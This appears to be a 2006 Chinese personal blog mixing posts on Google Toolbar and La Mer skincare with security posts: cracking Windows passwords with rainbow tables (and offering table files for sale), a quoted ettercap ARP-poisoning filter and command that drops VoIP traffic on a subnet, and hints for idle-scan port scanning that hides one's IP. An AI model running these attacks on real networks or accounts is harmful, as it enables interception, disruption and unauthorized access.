關於我自己

我的相片
New York, New York, United States
我叫江奕賢啦

2006年7月28日

新版 Google Toolbar 功能

Trends of your Search History Posted by Picasa


其實多了很多功能啦 我這裡提幾個還不錯的
開新視窗的速度變快了
多了Bookmark的功能 這樣 你的bookmark就可以帶著到處跑了
你也可以看自己這陣子搜尋的trends, 看你都大概幾點search, 都search些什麼
多了個『send to』的功能 可以把正在看的網頁 直接丟到blog上 或gmail裡面 或者sms到手機裡
還可以自己做icon放到toolbar上面喔
比如說 我就做了一個mmap和一個mdict的icon
這樣在google toolbar裡面 搜尋中文地址就會給你地圖
或者 打入英文 就會給你中文翻譯喔
改天我來多做一點services給google toolbar用好了

2006年7月22日

破解2GB的限制

很多系統上都無法處理超過2GB的檔案
比如說wget,你要他download一個超過2GB的檔案 他當場就裝死給你看
lynx download好一個超過2GB的檔案 你要他存檔的時候 她就跟你說 抱歉
甚至有些file system直接跟你說 沒辦法存超過2GB的檔案
很多web server甚至在header裡面會回報你一個負的檔案大小
導致flashget等序傳軟體無法啟動序傳功能(大檔很容易半途碰到timeout,所以需要續傳)
這些 在古老時代出生的老人們 都很能理解
但是 該怎麼解決ㄌㄟ?到底該怎麼downloadㄌㄟ?
我只能說 通常這時候 回歸原始是最簡單的解法
lynx -dump http://xxx.xxx/xxx.tar.gz > xxx.tar.gz 就解決了
file system無法存?
不需要我教妳head怎麼用吧?(不是罵你喔!我是說unix裡面的head指令啦)

2006年7月21日

幾分鐘內破解windows密碼

我的電腦有64G的硬碟嗎?有的 十倍都有
所以我可以用幾分鐘的時間 破解你的密碼
不論你有沒有用『鍵盤上』的特殊符號當密碼
brute force? 太慢了吧 要花個幾年吧
parallel computing? 不需要吧 又不是要我預測天氣 或者跟外星人溝通
就跟你說我有64G硬碟了
鍵盤上打得出來的符號排列組合的Rainbow Table 64G也就夠了
我電腦能空出幾分鐘來破解你的密碼嗎?有的
你的密碼值得我花幾分鐘嗎?I don't think so.

ref:
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/

聽說...Rainbow Table在上面那個網站是要花錢買的
有興趣的人 跟我買吧 半價算你啦!

手上剛好有這三種版本
lm alpha-numeric 1.5GB
lm alpha-numeric-symbol14 10GB
lm alpha-numeric-symbol32-space 42GB

keywords: "time memory trade off", "Rainbow Table", Ophcrack, RainbowCrack

PS:如果是你自己的電腦 忘記密碼了 不需要那麼麻煩啦
這個是你真的需要知道密碼才需要的啦
如果只是需要進某台電腦 是不需要這麼麻煩的

2006年7月13日

La Mer 海洋拉娜

手上一堆La Mer的產品 因為之前不知道那些是幹嘛的 就都放著沒動她們
所以都只用 CREAM DE LA MER 而已
今天心血來潮 查了一下 終於知道我手上這些是幹嘛的了
1=============
英文名稱: LA MER the oil absorbing lotion
海洋拉娜清爽型輕質乳液.
中/油性皮膚輕質乳霜
成份: "Mircle Broth"海澡濃縮精華、 鈣、鎂、鉀、鐵、維他命C及B12
2=============
中文品名:海洋拉娜晶鑽面膜 100ml
英文品名:LA MER The Refining Facial
用法:洗淨臉部後取適當以指尖話圈方式按摩於微濕肌膚再以清水沖淨即可
3===============
中文名:海洋拉娜LA MER眼霜
英文名:THE EYE BALM
容量: 3ml
用法:適量按摩於眼部肌膚
4===============
緊緻精華液the lifting face serum 5ml
極致緊膚精華液the lifting intensifier 2ml

而在「完美緊緻精華組」使用方法上,建議將臉洗淨後,拍上醒膚水後,取數滴緊緻精華液於指腹,以指腹打小圓,全臉及頸部使用。之後,在特別需要加強的地方,如抬頭紋、雙眉之間、眼週、唇紋,或任何有細皺紋的地方,以沾棒直接沾點極致緊膚精華液,於需要強化緊緻的部位,輕輕按壓,讓肌膚完全吸收,隨即你將感受到輕微的拉提感,但提醒勿全臉使用。

-------------------
另外 也查到一篇不錯的 摘錄如下
作者:咪咪匠(現居住美國)   發表時間:2004/12/07

昨天去了LA MER的年終回饋PARTY
用了些商品並跟大師級的生化工程師交談
來跟水水分享吧
首先 他們決定要停產原本的FACE SERUM(緊緻精華液)
然後那組一套兩瓶的就會取代之前的FACE SERUM 且不久後可以單買其中一瓶

眼霜--3倍面霜的菁華 用起來感覺不錯 不會刺激戴隱形眼鏡的眼睛
但黑眼圈的消除功能還在考驗中 但對眼睛水腫或眼袋倒是不錯唷

CREAM DE LA MER面霜--最原始的經典產品 適合各種肌膚
但是要用對使用方法 讓他們的BROTH釋放出來

LA MER 乳液--跟面霜一樣 但推薦給有上妝的水水可用於早上化妝品前

LA MER 控油乳液--跟面霜一樣 除非超油 不然生化工程師不推薦
因為會吸附臉部本身油脂 導致太乾燥

LA MER化妝水--感覺SOSO 工程師也覺得不需要一定要用LA MER的化妝水
藍色那罐可敷痘痘

LA MER卸妝潔顏乳--一直搞不清楚是怎麼用 現在才知道
它是可卸妝可洗臉的 但不會有泡沫就是了
所以喜歡泡沫的水水可能會不習慣
但這個是大力推薦商品之一

LA MER 卸妝潔顏膠--適合油肌 感覺很普通~

LA MER CONCENTRATE--超貴 但很值得~~
若要動手術前可先詢問醫師可否用這個
咪有認識的人是用這個抹在剖腹產的肚子上
後來都沒有疤 對嚴重痘疤也很有效
BUT 實在太貴了

LA MER 護唇霜--有薄荷味 很好吸收 不小心吃到會甜甜的

LA MER 晶鑽面膜--中文翻譯面膜 其實它是比較屬於磨砂膏
若真的要敷在臉上 不要超過2-5分鐘
若有草莓鼻的水水會很喜歡唷 因為對草莓鼻蠻有效的
一定要沖乾淨唷 不要留亮亮的鑽石在臉上唷

LA MER SPF18防曬乳--白色的 不會油 是化學性防曬
2005春夏會出有淺淺膚色的防曬乳

LA MER 噴霧化妝水--一定要搖一搖 裡面的分子才會作用唷

LA MER 身體菁華/身體乳--對靜脈曲張很有效 因為是針對加強身體血液循環的
有一點美白效果
但其實是因為身體皮膚細胞充滿水份
就會看起來亮白了

LA MER 護手霜--不便宜 但對緊急救護有效
譬如說明天突然有個會議 可能會握手交談
今晚趕緊使用 也會嫩嫩的

LA MER粉底--有保養成份 但遮暇力不強 若要超自然的妝可考慮
但很多人都不太習慣有化妝跟沒化妝差不多的感覺

LA MER粉餅跟蜜粉--均有保養成份 在美國市場調查 粉餅賣得比較好

2006年7月8日

不需要Router or Firewall權限 也可以直接檔掉某網路功能

本來想找個管理網路的軟體(遠端管理某台機器的某軟體使用的頻寬等)
後來想說 那我改改我的router好了
再後來 想說 乾脆用ARP Poison直接把router管理權搶過來算了
所以朝這方向研究了一下 看到這篇
發現用手上免費的的etterfilter和ettercap就可以達成了



>> # blockvoip.filter
>> # Proof of concept VoIP blocking filter
>> # By Natas
>> # Instructions:
>> # Run "etterfilter blockvoip.filter -o blockvoip.ef"
>> # Then "ettercap -T -q -F blockvoip.ef -M ARP /10.1.1.1-254/ //"
>>
>> if (ip.proto == UDP && udp.src == 4569) {
>> msg("Killed Attempted IAX2 Connection.\n");
>> drop();
>> kill();
>> }
>>
>> if (ip.proto == UDP && udp.src == 5060) {
>> msg("Killed Attempted SIP Connection.\n");
>> drop();
>> kill();
>> }
>>
>> if (ip.proto == UDP && udp.src == 2427) {
>> msg("Killed Attempted MGCP Connection.\n");
>> drop();
>> kill();
>> }
>>
>> # Don't know to much about MGCP Call Agent traffic but # I
>> put it in here for the hell of it.
>> if (ip.proto == UDP && udp.src == 2727) {
>> msg("Killed Attempted MGCP Call Agent Connection.\n");
>> drop();
>> kill();
>> }



只要把drop改成random照機率drop 或者delay一下再丟出去 應該就差不多了
嗯 用這招真是超方便 要是讓我早個十年發現...
算了 那時候宿網本來就歸我管 不需要用到ARP...
嗯 到Hotel或Starbucks用免費網路的時候說不定有用 哈哈 神不知鬼不覺的...
不過 我從不做這種犯罪的事情...
算了 還是記在我的筆記本就好了...

2006年7月1日

如何隱藏自己的IP 掃瞄別人的port

之前好像有哪位徒弟問過我這題

『有沒有辦法掃別人的Port (port scanning, 看某台機器開了哪些port) 但是不要洩漏出自己的IP (hide your ip address)?』

ㄟ!別沒事就想把跳板肉雞拿出來啊!我是問你algo你給我想作弊的方法啊?!
去!拿肉雞出來的 自己給我去牢裡蹲!

提示1:通常大家會朝『我把掃port的packet裡面的from不要填我自己的IP就好啦』想,
然後就會想到 咦?那怎麼拿回答案呢?如果你有想到這裡 你已經成功一半了!

提示2:任何一台機器, packet 的 sequence id 每收到一個packet會加一

怎樣 還是想不到?上廁所沒事幹的時候好好想想吧!

解答在這裡 http://www.insecure.org/nmap/idlescan.html

用這招(idle scan, IPID) 你甚至可以偵測到某firewall是不是把某IP ban掉了
你不需要從那個IP上測 就可以知道答案喔!
比如說 我想知道大陸某台機器 有沒有把Google的某IP ban掉,
我不用真的去Google那台機器上去測大陸的那台機器(ping, act, syn, etc)

喂喂喂!那個偷看答案的!罰你想另一題!

『當別人使用上面這招掃你的Port的時候 你要怎麼知道這個IP是假的?!』

想不出來的 自己來跟我撿幾個project去做 當作處罰!這麼簡單都不會!缺乏訓練!

再偷看的話 下次罰你想另一題喔!

『怎麼掃firewall後面的機器的port?』

最後這題Keyword: hping, firewalk